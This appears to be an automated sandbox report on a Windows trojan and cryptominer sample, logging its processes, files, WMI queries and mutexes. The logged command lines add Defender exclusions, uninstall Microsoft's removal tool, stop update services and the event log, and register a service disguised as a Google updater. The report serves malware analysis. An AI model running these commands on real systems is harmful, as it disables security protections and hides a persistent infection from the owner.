Modifies the hosts file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Windows\System32\conhost.exe

Code function: 57_2_0000000140001394 NtAddAtom,

57_2_0000000140001394

Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe

File created: C:\Windows\TEMP\pjjtwoljkwri.sys

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_00cy0hkb.aka.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Code function: 57_2_0000000140003250		57_2_0000000140003250
Source: C:\Windows\System32\conhost.exe	Code function: 57_2_00000001400027D0		57_2_00000001400027D0

Source: Joe Sandbox View

Dropped File: C:\Windows\Temp\pjjtwoljkwri.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: Updater.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Static PE information: Number of sections : 11 > 10

Source: pjjtwoljkwri.sys.34.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@88/13@2/3

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4352:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwzmnsne.emf.ps1

Jump to behavior

Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\explorer.exe
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\GoogleUP\Chrome\Updater.exe C:\ProgramData\GoogleUP\Chrome\Updater.exe
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
